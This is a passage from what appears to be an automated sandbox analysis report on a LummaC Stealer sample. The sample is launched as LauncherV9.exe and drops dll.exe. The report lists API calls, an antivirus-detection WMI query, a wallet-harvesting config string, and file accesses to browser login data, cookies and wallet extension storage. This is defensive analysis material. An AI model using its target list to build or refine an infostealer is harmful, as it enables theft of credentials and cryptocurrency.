Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: GetLocaleInfoW,	0_2_00007FF74632EA50
Source: C:\Users\user\AppData\Local\Service.exe	Code function: GetLocaleInfoW,	22_2_00007FF621C172A8
Source: C:\Users\user\AppData\Local\Service.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	22_2_00007FF621C171F8
Source: C:\Users\user\AppData\Local\Service.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	22_2_00007FF621C16994
Source: C:\Users\user\AppData\Local\Service.exe	Code function: EnumSystemLocalesW,	22_2_00007FF621C16CF0
Source: C:\Users\user\AppData\Local\Service.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	22_2_00007FF621C173DC
Source: C:\Users\user\AppData\Local\Service.exe	Code function: GetLocaleInfoW,	22_2_00007FF621C0D3E4
Source: C:\Users\user\AppData\Local\Service.exe	Code function: EnumSystemLocalesW,	22_2_00007FF621C0CF0C
Source: C:\Users\user\AppData\Local\Service.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	22_2_00007FF621C16E58
Source: C:\Users\user\AppData\Local\Service.exe	Code function: EnumSystemLocalesW,	22_2_00007FF621C16DC0
Source: C:\Users\user\AppData\Local\Service.exe	Code function: GetLocaleInfoW,	22_2_00007FF621C170A0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\LauncherV9.exe

Code function: 0_2_00007FF746312648 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF746312648

Source: dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004030000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558746783.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558094984.0000000004015000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\dll.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dll.exe PID: 8252, type: MEMORYSTR
Source: Yara match	File source: 13.2.jaclo.exe.ba0000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: dll.exe, 00000010.00000003.1573715800.00000000011E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: dll.exe, 00000010.00000003.1573715800.00000000011E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: dll.exe, 00000010.00000003.1573715800.00000000011E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"W^
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2Ps%
Source: dll.exe, 00000010.00000003.1472449424.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3y
Source: dll.exe, 00000010.00000003.1573715800.00000000011E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: dll.exe, 00000010.00000003.1527625878.000000000124F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2Ps%
Source: dll.exe, 00000010.00000003.1472449424.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
